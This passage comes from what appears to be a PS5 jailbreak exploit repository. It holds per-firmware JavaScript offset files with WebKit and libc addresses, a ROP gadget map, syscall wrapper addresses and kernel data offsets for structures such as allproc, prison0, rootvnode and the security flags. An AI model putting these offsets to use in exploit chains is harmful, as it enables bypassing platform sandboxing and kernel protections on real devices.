221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x6FEC;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x316FEC;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE6FEC;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.21.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D658,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EF7B,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A269F3,
42 | "add rax, rdx" : 0x016D5582,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | //check
48 | let syscall_map = {
49 | 0x001: 0x33B80, // sys_exit
50 | 0x002: 0x34B30, // sys_fork
51 | 0x003: 0x32D50, // sys_read
52 | 0x004: 0x32CB0, // sys_write
53 | 0x005: 0x33350, // sys_open
54 | 0x006: 0x33980, // sys_close
55 | 0x007: 0x32570, // sys_wait4
56 | 0x00A: 0x34670, // sys_unlink
57 | 0x00C: 0x34000, // sys_chdir
58 | 0x00F: 0x33A00, // sys_chmod
59 | 0x014: 0x32ED0, // sys_getpid
60 | 0x017: 0x329D0, // sys_setuid
61 | 0x018: 0x33FE0, // sys_getuid
62 | 0x019: 0x33390, // sys_geteuid
63 | 0x01B: 0x33430, // sys_recvmsg
64 | 0x01C: 0x33660, // sys_sendmsg
65 | 0x01D: 0x341B0, // sys_recvfrom
66 | 0x01E: 0x328D0, // sys_accept
67 | 0x01F: 0x326F0, // sys_getpeername
68 | 0x020: 0x34810, // sys_getsockname
69 | 0x021: 0x34330, // sys_access
70 | 0x022: 0x344B0, // sys_chflags
71 | 0x023: 0x33E80, // sys_fchflags
72 | 0x024: 0x34D60, // sys_sync
73 | 0x025: 0x33330, // sys_kill
74 | 0x027: 0x32DD0, // sys_getppid
75 | 0x029: 0x34390, // sys_dup
76 | 0x02A: 0x32D20, // sys_pipe
77 | 0x02B: 0x349D0, // sys_getegid
78 | 0x02C: 0x34D20, // sys_profil
79 | 0x02F: 0x32870, // sys_getgid
80 | 0x031: 0x32850, // sys_getlogin
81 | 0x032: 0x340E0, // sys_setlogin
82 | 0x035: 0x32A90, // sys_sigaltstack
83 | 0x036: 0x32BF0, // sys_ioctl
84 | 0x037: 0x33EC0, // sys_reboot
85 | 0x038: 0x33DC0, // sys_revoke
86 | 0x03B: 0x340C0, // sys_execve
87 | 0x041: 0x33A60, // sys_msync
88 | 0x049: 0x33250, // sys_munmap
89 | 0x04A: 0x33FC0, // sys_mprotect
90 | 0x04B: 0x33140, // sys_madvise
91 | 0x04E: 0x33310, // sys_mincore
92 | 0x04F: 0x327D0, // sys_getgroups
93 | 0x050: 0x32D70, // sys_setgroups
94 | 0x053: 0x327B0, // sys_setitimer
95 | 0x056: 0x325D0, // sys_getitimer
96 | 0x059: 0x33E20, // sys_getdtablesize
97 | 0x05A: 0x34230, // sys_dup2
98 | 0x05C: 0x33860, // sys_fcntl
99 | 0x05D: 0x333B0, // sys_select
100 | 0x05F: 0x32810, // sys_fsync
101 | 0x060: 0x33740, // sys_setpriority
102 | 0x061: 0x32F90, // sys_socket
103 | 0x062: 0x34020, // sys_connect
104 | 0x063: 0x34990, // sys_netcontrol
105 | 0x064: 0x32590, // sys_getpriority
106 | 0x065: 0x345B0, // sys_netabort
107 | 0x066: 0x34930, // sys_netgetsockinfo
108 | 0x068: 0x34630, // sys_bind
109 | 0x069: 0x338A0, // sys_setsockopt
110 | 0x06A: 0x32B90, // sys_listen
111 | 0x071: 0x33BA0, // sys_socketex
112 | 0x072: 0x33570, // sys_socketclose
113 | 0x074: 0x34D40, // sys_gettimeofday
114 | 0x075: 0x34E20, // sys_getrusage
115 | 0x076: 0x32550, // sys_getsockopt
116 | 0x078: 0x337E0, // sys_readv
117 | 0x079: 0x33640, // sys_writev
118 | 0x07A: 0x34290, // sys_settimeofday
119 | 0x07C: 0x331D0, // sys_fchmod
120 | 0x07D: 0x33A40, // sys_netgetiflist
121 | 0x07E: 0x34910, // sys_setreuid
122 | 0x07F: 0x33530, // sys_setregid
123 | 0x080: 0x34490, // sys_rename
124 | 0x083: 0x334B0, // sys_flock
125 | 0x085: 0x34D80, // sys_sendto
126 | 0x086: 0x34BB0, // sys_shutdown
127 | 0x087: 0x33F40, // sys_socketpair
128 | 0x088: 0x33CE0, // sys_mkdir
129 | 0x089: 0x32F30, // sys_rmdir
130 | 0x08A: 0x32440, // sys_utimes
131 | 0x08C: 0x348D0, // sys_adjtime
132 | 0x08D: 0x33A20, // sys_kqueueex
133 | 0x093: 0x33C80, // sys_setsid
134 | 0x0A5: 0x32770, // sys_sysarch
135 | 0x0B6: 0x34710, // sys_setegid
136 | 0x0B7: 0x325B0, // sys_seteuid
137 | 0x0BC: 0x34770, // sys_stat
138 | 0x0BD: 0x34B70, // sys_fstat
139 | 0x0BE: 0x33550, // sys_lstat
140 | 0x0BF: 0x32C50, // sys_pathconf
141 | 0x0C0: 0x33F00, // sys_fpathconf
142 | 0x0C2: 0x33490, // sys_getrlimit
143 | 0x0C3: 0x33070, // sys_setrlimit
144 | 0x0C4: 0x34690, // sys_getdirentries
145 | 0x0CA: 0x34470, // sys___sysctl
146 | 0x0CB: 0x33B20, // sys_mlock
147 | 0x0CC: 0x34510, // sys_munlock
148 | 0x0CE: 0x32FD0, // sys_futimes
149 | 0x0D1: 0x335B0, // sys_poll
150 | 0x0E8: 0x32670, // sys_clock_gettime
151 | 0x0E9: 0x33AE0, // sys_clock_settime
152 | 0x0EA: 0x34AE0, // sys_clock_getres
153 | 0x0EB: 0x346B0, // sys_ktimer_create
154 | 0x0EC: 0x32E30, // sys_ktimer_delete
155 | 0x0ED: 0x34B90, // sys_ktimer_settime
156 | 0x0EE: 0x34040, // sys_ktimer_gettime
157 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
158 | 0x0F0: 0x34570, // sys_nanosleep
159 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
160 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
161 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
162 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
163 | 0x0FD: 0x341D0, // sys_issetugid
164 | 0x110: 0x34970, // sys_getdents
165 | 0x121: 0x34080, // sys_preadv
166 | 0x122: 0x335D0, // sys_pwritev
167 | 0x136: 0x332D0, // sys_getsid
168 | 0x13B: 0x34790, // sys_aio_suspend
169 | 0x144: 0x32E50, // sys_mlockall
170 | 0x145: 0x34250, // sys_munlockall
171 | 0x147: 0x32F50, // sys_sched_setparam
172 | 0x148: 0x33BC0, // sys_sched_getparam
173 | 0x149: 0x32710, // sys_sched_setscheduler
174 | 0x14A: 0x33590, // sys_sched_getscheduler
175 | 0x14B: 0x333F0, // sys_sched_yield
176 | 0x14C: 0x32990, // sys_sched_get_priority_max
177 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
178 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
179 | 0x154: 0x324A0, // sys_sigprocmask
180 | 0x155: 0x324E0, // sys_sigsuspend
181 | 0x157: 0x343B0, // sys_sigpending
182 | 0x159: 0x344D0, // sys_sigtimedwait
183 | 0x15A: 0x34110, // sys_sigwaitinfo
184 | 0x16A: 0x346F0, // sys_kqueue
185 | 0x16B: 0x32950, // sys_kevent
186 | 0x17B: 0x328F0, // sys_mtypeprotect
187 | 0x188: 0x32A10, // sys_uuidgen
188 | 0x189: 0x34E60, // sys_sendfile
189 | 0x18D: 0x32EB0, // sys_fstatfs
190 | 0x190: 0x32A70, // sys_ksem_close
191 | 0x191: 0x33800, // sys_ksem_post
192 | 0x192: 0x340A0, // sys_ksem_wait
193 | 0x193: 0x34E40, // sys_ksem_trywait
194 | 0x194: 0x32BB0, // sys_ksem_init
195 | 0x195: 0x345D0, // sys_ksem_open
196 | 0x196: 0x342B0, // sys_ksem_unlink
197 | 0x197: 0x32A30, // sys_ksem_getvalue
198 | 0x198: 0x34270, // sys_ksem_destroy
199 | 0x1A0: 0x34750, // sys_sigaction
200 | 0x1A1: 0x343F0, // sys_sigreturn
201 | 0x1A5: 0x330D0, // sys_getcontext
202 | 0x1A6: 0x33E00, // sys_setcontext
203 | 0x1A7: 0x33F20, // sys_swapcontext
204 | 0x1AD: 0x33120, // sys_sigwait
205 | 0x1AE: 0x327F0, // sys_thr_create
206 | 0x1AF: 0x32B50, // sys_thr_exit
207 | 0x1B0: 0x334F0, // sys_thr_self
208 | 0x1B1: 0x32B70, // sys_thr_kill
209 | 0x1B9: 0x34190, // sys_ksem_timedwait
210 | 0x1BA: 0x324C0, // sys_thr_suspend
211 | 0x1BB: 0x32DF0, // sys_thr_wake
212 | 0x1BC: 0x33E60, // sys_kldunloadf
213 | 0x1C6: 0x34B50, // sys__umtx_op
214 | 0x1C7: 0x34890, // sys_thr_new
215 | 0x1C8: 0x347F0, // sys_sigqueue
216 | 0x1D0: 0x34150, // sys_thr_set_name
217 | 0x1D2: 0x33700, // sys_rtprio_thread
218 | 0x1DB: 0x32E90, // sys_pread
219 | 0x1DC: 0x33FA0, // sys_pwrite
220 | 0x1DD: 0x34870, // sys_mmap
221 | 0x1DE: 0x34370, // sys_lseek
222 | 0x1DF: 0x33410, // sys_truncate
223 | 0x1E0: 0x32E70, // sys_ftruncate
224 | 0x1E1: 0x32460, // sys_thr_kill2
225 | 0x1E2: 0x34DE0, // sys_shm_open
226 | 0x1E3: 0x34850, // sys_shm_unlink
227 | 0x1E6: 0x33090, // sys_cpuset_getid
228 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
229 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
230 | 0x1F3: 0x32830, // sys_openat
231 | 0x203: 0x33EE0, // sys___cap_rights_get
232 | 0x20A: 0x33920, // sys_pselect
233 | 0x214: 0x339E0, // sys_regmgr_call
234 | 0x215: 0x33760, // sys_jitshm_create
235 | 0x216: 0x33D40, // sys_jitshm_alias
236 | 0x217: 0x32C30, // sys_dl_get_list
237 | 0x218: 0x33A80, // sys_dl_get_info
238 | 0x21A: 0x339C0, // sys_evf_create
239 | 0x21B: 0x32E10, // sys_evf_delete
240 | 0x21C: 0x33D60, // sys_evf_open
241 | 0x21D: 0x33940, // sys_evf_close
242 | 0x21E: 0x33C00, // sys_evf_wait
243 | 0x21F: 0x343D0, // sys_evf_trywait
244 | 0x220: 0x33D80, // sys_evf_set
245 | 0x221: 0x342F0, // sys_evf_clear
246 | 0x222: 0x33100, // sys_evf_cancel
247 | 0x223: 0x33BE0, // sys_query_memory_protection
248 | 0x224: 0x334D0, // sys_batch_map
249 | 0x225: 0x336E0, // sys_osem_create
250 | 0x226: 0x326B0, // sys_osem_delete
251 | 0x227: 0x32630, // sys_osem_open
252 | 0x228: 0x34C30, // sys_osem_close
253 | 0x229: 0x33CC0, // sys_osem_wait
254 | 0x22A: 0x342D0, // sys_osem_trywait
255 | 0x22B: 0x33F60, // sys_osem_post
256 | 0x22C: 0x33840, // sys_osem_cancel
257 | 0x22D: 0x335F0, // sys_namedobj_create
258 | 0x22E: 0x332F0, // sys_namedobj_delete
259 | 0x22F: 0x34EC0, // sys_set_vm_container
260 | 0x230: 0x32DB0, // sys_debug_init
261 | 0x233: 0x33720, // sys_opmc_enable
262 | 0x234: 0x32790, // sys_opmc_disable
263 | 0x235: 0x337A0, // sys_opmc_set_ctl
264 | 0x236: 0x337C0, // sys_opmc_set_ctr
265 | 0x237: 0x34210, // sys_opmc_get_ctr
266 | 0x23C: 0x33030, // sys_virtual_query
267 | 0x249: 0x34650, // sys_is_in_sandbox
268 | 0x24A: 0x33210, // sys_dmem_container
269 | 0x24B: 0x33AC0, // sys_get_authinfo
270 | 0x24C: 0x32610, // sys_mname
271 | 0x24F: 0x32C10, // sys_dynlib_dlsym
272 | 0x250: 0x32F10, // sys_dynlib_get_list
273 | 0x251: 0x349B0, // sys_dynlib_get_info
274 | 0x252: 0x338C0, // sys_dynlib_load_prx
275 | 0x253: 0x328B0, // sys_dynlib_unload_prx
276 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
277 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
278 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
279 | 0x258: 0x32480, // sys_sandbox_path
280 | 0x259: 0x32FF0, // sys_mdbg_service
281 | 0x25A: 0x33680, // sys_randomized_path
282 | 0x25B: 0x344F0, // sys_rdup
283 | 0x25C: 0x32AF0, // sys_dl_get_metadata
284 | 0x25D: 0x33230, // sys_workaround8849
285 | 0x25E: 0x329F0, // sys_is_development_mode
286 | 0x25F: 0x33B60, // sys_get_self_auth_info
287 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
288 | 0x262: 0x34EA0, // sys_budget_get_ptype
289 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
290 | 0x264: 0x34C10, // sys_get_proc_type_info
291 | 0x265: 0x32420, // sys_get_resident_count
292 | 0x267: 0x33780, // sys_get_resident_fmem_count
293 | 0x268: 0x34830, // sys_thr_get_name
294 | 0x269: 0x33E40, // sys_set_gpo
295 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
296 | 0x26B: 0x32930, // sys_test_debug_rwmem
297 | 0x26C: 0x32A50, // sys_free_stack
298 | 0x26E: 0x32650, // sys_ipmimgr_call
299 | 0x26F: 0x33AA0, // sys_get_gpo
300 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
301 | 0x271: 0x34430, // sys_opmc_set_hw
302 | 0x272: 0x32F70, // sys_opmc_get_hw
303 | 0x273: 0x325F0, // sys_get_cpu_usage_all
304 | 0x274: 0x33C60, // sys_mmap_dmem
305 | 0x275: 0x33010, // sys_physhm_open
306 | 0x276: 0x33820, // sys_physhm_unlink
307 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
308 | 0x279: 0x332B0, // sys_thr_resume_ucontext
309 | 0x27A: 0x33270, // sys_thr_get_ucontext
310 | 0x27B: 0x33370, // sys_thr_set_ucontext
311 | 0x27C: 0x32FB0, // sys_set_timezone_info
312 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
313 | 0x27E: 0x330B0, // sys_utc_to_localtime
314 | 0x27F: 0x34EE0, // sys_localtime_to_utc
315 | 0x280: 0x34060, // sys_set_uevt
316 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
317 | 0x282: 0x33450, // sys_get_map_statistics
318 | 0x283: 0x341F0, // sys_set_chicken_switches
319 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
320 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
321 | 0x288: 0x32690, // sys_app_state_change
322 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
323 | 0x28C: 0x32730, // sys_process_terminate
324 | 0x28D: 0x32EF0, // sys_blockpool_open
325 | 0x28E: 0x32C90, // sys_blockpool_map
326 | 0x28F: 0x346D0, // sys_blockpool_unmap
327 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
328 | 0x291: 0x333D0, // sys_blockpool_batch
329 | 0x292: 0x32B30, // sys_fdatasync
330 | 0x293: 0x33050, // sys_dynlib_get_list2
331 | 0x294: 0x34DA0, // sys_dynlib_get_info2
332 | 0x295: 0x34550, // sys_aio_submit
333 | 0x296: 0x32AD0, // sys_aio_multi_delete
334 | 0x297: 0x33900, // sys_aio_multi_wait
335 | 0x298: 0x329B0, // sys_aio_multi_poll
336 | 0x299: 0x34450, // sys_aio_get_data
337 | 0x29A: 0x338E0, // sys_aio_multi_cancel
338 | 0x29B: 0x32890, // sys_get_bio_usage_all
339 | 0x29C: 0x33F80, // sys_aio_create
340 | 0x29D: 0x349F0, // sys_aio_submit_cmd
341 | 0x29E: 0x348F0, // sys_aio_init
342 | 0x29F: 0x34350, // sys_get_page_table_stats
343 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
344 | 0x2A1: 0x34950, // sys_blockpool_move
345 | 0x2A2: 0x347D0, // sys_virtual_query_all
346 | 0x2A3: 0x33880, // sys_reserve_2mb_page
347 | 0x2A4: 0x34130, // sys_cpumode_yield
348 | 0x2A5: 0x33C40, // sys_wait6
349 | 0x2A6: 0x336A0, // sys_cap_rights_limit
350 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
351 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
352 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
353 | 0x2AA: 0x32910, // sys_cap_fcntls_get
354 | 0x2AB: 0x34C70, // sys_bindat
355 | 0x2AC: 0x33470, // sys_connectat
356 | 0x2AD: 0x326D0, // sys_chflagsat
357 | 0x2AE: 0x32520, // sys_accept4
358 | 0x2AF: 0x32B10, // sys_pipe2
359 | 0x2B0: 0x33510, // sys_aio_mlock
360 | 0x2B1: 0x34BF0, // sys_procctl
361 | 0x2B2: 0x33EA0, // sys_ppoll
362 | 0x2B3: 0x33DE0, // sys_futimens
363 | 0x2B4: 0x34590, // sys_utimensat
364 | 0x2B5: 0x33B00, // sys_numa_getaffinity
365 | 0x2B6: 0x33960, // sys_numa_setaffinity
366 | 0x2C1: 0x32970, // sys_get_phys_page_size
367 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
368 | 0x2CC: 0x331B0, // sys_openintr
369 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
370 | 0x2CE: 0x33290, // sys_acinfo_add
371 | 0x2CF: 0x32500, // sys_acinfo_delete
372 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
373 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
374 | 0x2D2: 0x32750, // sys_workspace_ctrl
375 | };
376 |
377 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x702A;
378 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x31702A;
379 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE702A;
380 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
381 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
382 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
383 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
384 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
385 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
386 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
387 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.00.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04520;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
